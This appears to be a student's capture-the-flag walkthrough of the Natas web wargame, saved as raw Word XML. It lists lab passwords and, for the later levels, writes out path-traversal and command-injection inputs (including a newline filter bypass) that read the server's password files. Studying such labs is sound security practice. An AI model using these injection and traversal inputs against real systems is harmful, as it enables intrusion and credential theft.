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D71D5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Level 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B4C22E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useraname: natas0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618A5BB1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password : natas0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC6E3E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I get message "You can find the password for the next level on this page."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704E0B4D" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D146D73" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B7C4F3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Level 0 --&gt; Level 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0B4E9C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Username: natas1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D37038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Password: 0nzCigAq7t2iALyvU9xcHlYN4MlkIwlq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5284DB00" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD273DA" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DB35EC5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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0547669D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Open the link in a browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F384D9C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The page says "find the password on this page."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E061278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right click --&gt; View Page Source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FF534B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The password is hidden inside a comment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332B4BF3" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0D6BBE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Tools Used:Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EB0FEB" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CE978B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Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74987BEC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Sometimes websites hide information in the page source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D6F111" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08EAD50C" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33FBE5DB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Level 1 --&gt; Level 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ADDABF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Username: natas1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ADC992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Password: TguMNxKo1DSa1tujBLuZJnDUlCcUAPlI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571ACD5D" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A455522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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DFC5DB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Open the URL and log in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B6277D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The page tells to "view the source."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E15EACF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Right-click → View Page Source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DDDF8B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Find the password inside a comment again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD590E3" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2459E9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Tools Used:Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609A2CD0" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15B61A6E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Logic:websites hide information in the page source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0620B2E6" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7BD93A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Level 2 → Level 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D495E56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Username: natas3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B4E208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Password: 3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3050301D" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F528EE5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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D40B02B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Opened the page nothing was there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B35EAD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lastRenderedPageBreak/>
        <w:t>right click --&gt; View Page Source --&gt; it has mentioned /files directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D43F2D5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visited the  http://natas2.natas.labs.overthewire.org/files/.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C7A302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Find and opened file users.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC53E18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Inside that file, i got the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEC0BAA" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768856A4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Tools Used:Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6770C245" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD9B219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Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19924B8A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The hint told us about another file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C68BAB0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files cannot accessed by directly we can find them by listing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CEA556" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA9C550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Level 3--&gt;Level 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E034549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Username: natas4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E85D656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Password: QryZXc2e0zahULdHrtHxzyYkj59kUxLQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7C92C3" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0916FD83" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="520846AE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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228C74FA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Open the page --&gt; there was no info visible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017066A7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right click --&gt; View Page Source --&gt; there is a hidden directory named /s3cr3t/.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501EC140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I visit the http://natas3.natas.labs.overthewire.org/s3cr3t/.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E89103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lastRenderedPageBreak/>
        <w:t>Password is shown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63100072" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77EE05E1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Tools Used:Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01647B3C" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D84EE5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Logic:if we know thw url we can find the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33574D1B" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3735E6B4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Level 4 --&gt; Level 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E05A13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Username: natas5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC626C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Password: 0n35PkggAPm2zbEpOU802c0x0Msn1ToK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8882B4" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290B1972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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DBED2D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after log in i get message like this "Access disallowed."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7526AB1D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right click --&gt; View Page Source --&gt; i get hint about the Referer header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677F7A95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setting the Referer to http://natas5.natas.labs.overthewire.org.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208E9A7F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Used tool named curl, Postman, or browser extension ModHeader to fake the Referer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C9B0FD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After setting the correct Referer,reloaded the page and get the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69978BE3" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75DE6338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Tools Used:curl(terminal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9160CA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Postman(API tool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373B128E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lastRenderedPageBreak/>
        <w:t>ModHeader(browser extension)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70439E16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curl -u natas4:&lt;password&gt; -H "Referer: http://natas5.natas.labs.overthewire.org" h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D149D49" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE2FDEB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Logic:websites know from where you come and they can block you with help of referer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0133F8B7" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D93DE0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Level 5 --&gt; Level 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46279976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Username: natas6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7837160F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Password: 0RoJwHdSKWFTYR5WuiAewauSuNaBXned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7456479D" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D065024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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663D4387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Visited the URL after that page says "Access disallowed.You are not logged in."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575472B3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right click --&gt; View Page Source --&gt; get the  hint about a cookie called loggedin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC12301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Used browser devtools--&gt;Inspect --&gt; Application --&gt; Cookies and modify the cookie value from 0 to 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568BF5E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Refresh the page and after that the i get the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E826978" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C14DEC8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Tools Used:Browser DevTools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B395B8" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F837F5F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Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BA3CF2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lastRenderedPageBreak/>
        <w:t>Websites use cookies to track logged-in users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC0FD29" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FBCE14B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Level 6 --&gt; Level 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1BB417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Username: natas7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD8B8E3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Password: bmg8SvU1LizuWjx3y7xkNERkHxGre0GS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E39B0D5" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3641C973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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DA142D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i see the Page is asking for a secret with the form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D44BC32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right click --&gt; View Page Source --&gt; i found a comment mentioning a file  /includes/secret.inc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F48655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Visited http://natas6.natas.labs.overthewire.org/includes/secret.inc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD23F3F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that file contains the secret value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD141F5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Entered the secret value into the form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DC2753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i got the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDD7464" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C706FB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 xml:space="preserve">Tools Used:Browser </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45639F2E" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19DE72F1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Logic:By using hidden files we can find the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EC491E" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54BDB4E7" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD1D3D1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Level 7 --&gt; Level 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B7C0DB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lastRenderedPageBreak/>
        <w:t>Username: natas8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6E79C8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Password: xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6542E0E5" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BA991E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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E90EB43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Page has two button Home and About.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189E619A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when i click on the button in the URL  the links  shows me ?page=home or ?page=about.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1318F4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I changed the  URL manually like this --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB11178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?page=../../etc/natas_webpass/natas8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F817B7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i got the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B28945" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1148E1FA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Logic:we can reach the files by directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3411F95B" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3097E11D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Level 8 --&gt; Level 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA3F332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Username: natas9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B5A0F4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Password: ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EC77AC" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B7E2D1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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668543E4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Page has a form asking for a secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218A651C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right click --&gt; View Page Source --&gt; shows some PHP code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5555B07F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The code uses encodeSecret() to transform the real password into a hashed secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5360E35C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lastRenderedPageBreak/>
        <w:t>Reverse the simple encoding logic  by writing a short python script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FF177D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Decode it by idle and find the secret --&gt; submit in the form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4334F2CC" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61535486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Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DE7F68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 xml:space="preserve">Python Script </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CA93BE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Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5492CD7E" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE24327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Logic: understand what is encoding and how to reverse it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6936E39E" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C703EE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Level 9 --&gt; Level 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EEB200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Username: natas10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2FA39B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Password: t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A469F2" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E812D7A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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBA5C84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Page has a search box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647BFA75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Entered random text--&gt; shows results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034457CA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View Source — PHP code uses user input directly inside a Linux grep command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE88878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typed ; cat /etc/natas_webpass/natas10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C84441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The injected command shows the password for the next level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEF484F" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B5B83E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lastRenderedPageBreak/>
        <w:t>Tools Used:Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576A0F8B" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE32C6D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Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182C1EC7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The search box was vulnerable to Command Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA56F36" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A8704A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Level 10 --&gt; Level 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E8A285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Username: natas11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AFA7C6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Password: UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C44081" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BEB6C14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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119E2598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Page has a search box again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B14E21A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right click--&gt;View Source --&gt; it has used a Linux grep command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B32EDE3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But input is now filtered i.e ;, |, &amp; are blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD13C7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Used a newline character (%0a) instead of ; to break the command and inject new commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4C8BF1" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A15D71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In the search box i entered test%0acat /etc/natas_webpass/natas11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538A7711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i got the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020697CD" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51FA5808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Tools Used:Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C100C78" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EBB0EBD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lastRenderedPageBreak/>
        <w:t>Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49315CE0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Even though basic symbols are blocked you should know the browser URL knowledge.</w:t>
      </w:r>
